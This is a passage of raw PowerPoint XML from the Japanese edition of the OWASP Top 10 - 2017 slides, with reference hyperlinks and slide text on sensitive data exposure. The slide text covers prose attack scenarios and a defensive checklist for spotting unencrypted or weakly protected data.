Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="Externa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slide" Target="slide22.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html"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microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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ASVS_V5_Input_validation_and_output_encoding" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinjection" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.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www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)"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Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.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SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="(https:/portswigger.net/kb/issues/00101080_serversidetemplateinjection)"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github.com/danielmiessler/SecLists/tree/master/Passwords"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s://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.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7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xm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6080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preferRelativeResize="0">
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381600"/>
            <a:ext cx="3261600" cy="9972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108822" y="9243000"/>
            <a:ext cx="1080000" cy="259200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1828800"/>
            <a:ext cx="6019800" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>最も重大なウェブアプリケーションリスクトップ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>日</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>日本語版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>日</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935032" y="9356656"/>
            <a:ext cx="4389568" cy="430887"/>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This work is licensed under a </a:t>
            </a:r>
            <a:b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endPar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3" name="Grafik 2"/>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990601" y="5302600"/>
            <a:ext cx="4876397" cy="3250800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="9488895"/>
            <a:ext cx="1630232" cy="261610"/>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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>あるアプリケーションは、データベースの自動暗号化を使用し、クレジットカード番号を暗号化します。しかし、そのデータが取得されるときに自動的に復号されるため、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>インジェクションによって平文のクレジットカード番号を取得できてしまいます。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>あるサイトは、すべてのページで</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>で使っておらず、ユーザに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を強制していません。また、そのサイトでは弱い暗号アルゴリズムをサポートしています。攻撃者はネットワークトラフィックを監視し（例えば、暗号化していない無線ネットワークで）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通信を</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通信にダウングレードしそのリクエストを盗聴することで、ユーザのセッションクッキーを盗みます。そして、攻撃者はこのクッキーを再送しユーザの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>認証された</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>セッションを乗っ取り、そのユーザの個人データを閲覧および改ざんできます。また、攻撃者はセッションを乗っ取る代わりに、すべての送信データ（例えば、入金の受取人）を改ざんできます。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>あるパスワードデータベースは、ソルトなしのハッシュまたは単純なハッシュでパスワードを保存しています。もし、ファイルアップロードの欠陥があれば、攻撃者はそれを悪用して、パスワードデータベースを取得できます。事前に計算されたハッシュのレインボーテーブルで、すべてのソルトなしのハッシュが解読されてしまいます。そして、たとえソルトありでハッシュ化されていても、単純または高速なハッシュ関数で生成したハッシュは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>で解読されてしまうかもしれません。</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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>まず、送信あるいは保存するデータが保護を必要とするか見極めます。例えば、パスワード、クレジットカード番号、健康記録、個人データやビジネス上の機密は特に保護する必要があります。データに対して、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>EU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>の一般データ保護規則</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(GDPR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>のようなプライバシー関連の法律が適用される場合、また、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PCI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>データセキュリティスタンダード</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(PCI DSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>など金融の情報保護の要求があるような規定がある場合には、特に注意が必要です。そのようなデータすべてについて、以下を確認してください</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>どんなデータであれ平文で送信していないか。これは、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>のようなプロトコルを使っている場合に該当する。内部からインターネットに送信する場合、特に危険である。また、ロードバランサ、ウェブサーバ、バックエンドシステムなどの内部の通信もすべて確認する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>バックアップも含め、機密データを平文で保存していないか。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>古いまたは弱い暗号アルゴリズムを初期設定のまま、または古いコードで使っていないか。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
